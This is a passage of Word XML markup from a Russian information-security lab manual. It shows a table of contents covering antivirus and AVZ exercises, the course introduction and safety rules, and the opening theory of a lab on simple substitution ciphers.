        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811336 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>82</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37" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 17. Изучение работы программы AVZ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811337 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>98</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38" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 18. Основные признаки присутствия вредоносных программ и методы по устранению последствий вирусных заражений компьютерной системы</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811338 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>109</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39" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 19. Сравнительный анализ анализ антивирусных программ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811339 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>119</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40" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 20. Мониторинг подозрительных процессов с помощью специальных программ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811340 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>128</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41" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 21. Скрипты управления программы AVZ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811341 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>133</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42" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 22. Работа скриптов программы AVZ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811342 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>154</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43" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 23. Установка и предварительная настройка Антивируса Касперского</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811343 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>156</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53" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа 24. Работа с Антивирусом Касперского</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811353 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>172</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00C5462E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc3811365" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Список рекомендуемых источников</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811365 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>195</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pP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lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc3811319"/>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="celi"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Дисциплина «Информационная безопасность» имеет своей целью: изучение основных принципов, методов и средств защиты информации в процессе ее обработки, передачи и хранения с использованием компьютерных средств в информационных системах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Задачи освоения учебной дисциплины:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>освоить методы и средства защиты информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>изучить документы в области обеспечения информационной безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0087741E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0087741E">
        <w:t>Процесс изучения дисциплины направлен на формирование следующих компетенций:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0087741E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0087741E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3F0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0087741E">
        <w:t>О</w:t>
      </w:r>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="0087741E">
        <w:t>К-</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0087741E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w: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r w:rsidRPr="0087741E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>лабораторные работы №1-8</w:t>
      </w:r>
      <w:r w:rsidRPr="0087741E">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Аппаратура и материалы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для выполнения лабораторных работ необходим персональный компьютер со следующими характеристиками: процессор Intel Pentium с тактовой частотой 800 МГц и выше, оперативная память – не менее 64 Мбайт, свободное дисковое пространство – не менее 500 Мбайт, устройство для чтения компакт-дисков, монитор типа Super VGA (число цветов – 256) с диагональю не менее 15″. Программное обеспечение – операционная система </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WINDOWS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 98 / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / 2000 / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и выше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Указания по технике безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Техника безопасности при выполнении лабораторной работы совпадает с общепринятой для пользователей персональных компьютеров:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>– самостоятельно не производить ремонт персонального компьютера, установку и удаление программного обеспечения; в случае неисправности персонального компьютера сообщить об этом обслуживающему персоналу лаборатории (оператору, администратору); соблюдать правила техники безопасности при работе с электрооборудованием; не касаться электрических розеток металлическими предметами; рабочее место пользователя персонального компьютера должно содержаться в чистоте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="l1"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="104" w:name="_Toc3811320"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="001B484F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>работа № 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc3811321"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шифрование информации методом простой подстановки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc3811322"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>изучение порядка зашифрования и расшифрования информации методом простой подстановки, получение навыков дешифрования информации, зашифрованной этим методом.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В данной лабораторной работе изучается шифрование информации методом простой подстановки. Данный шифр относится к группе шифров подстановки. Суть этого метода заключается в том, что каждый символ исходного алфавита заменяется одним символом алфавита шифрования. Основным недостатком этого метода является его относительная нестойкость к дешифрованию, обусловленная тем, что в зашифрованном тексте сохраняется частота появления символов, соответствующая частоте появления символов в исходном тексте. Устранение этого недостатка достигается методом сложной подстановки замены каждого символа из исходного алфавита более чем одним символом из алфавита шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рассмотрим схему действия метода простой подстановки. Работа по шифрованию информации этим методом начинается с составления таблицы шифрования. Первый столбец этой таблицы состоит из всех символов исходного текста. Во втором столбце записываются символы, которыми символы исходного текста будут заменяться. Каждый символ исходного текста заменяется одним символом. Следует заметить, что каждый символ замены можно использовать только один раз, то есть если, например, символ «р» заменяет символ «а», то он больше не может заменять ни один другой символ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>После того как каждому символу исходного алфавита поставлен в соответствие символ замены, получаем таблицу шифрования, на основании которой и производится шифрование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Шифрование включает в себя </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>зашифрование</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, то есть перевод открытого текста в зашифрованный вид, и </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>расшифрование</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – восстановление исходного текста по его зашифрованному представлению. Оба действия используют одну и ту же таблицу шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
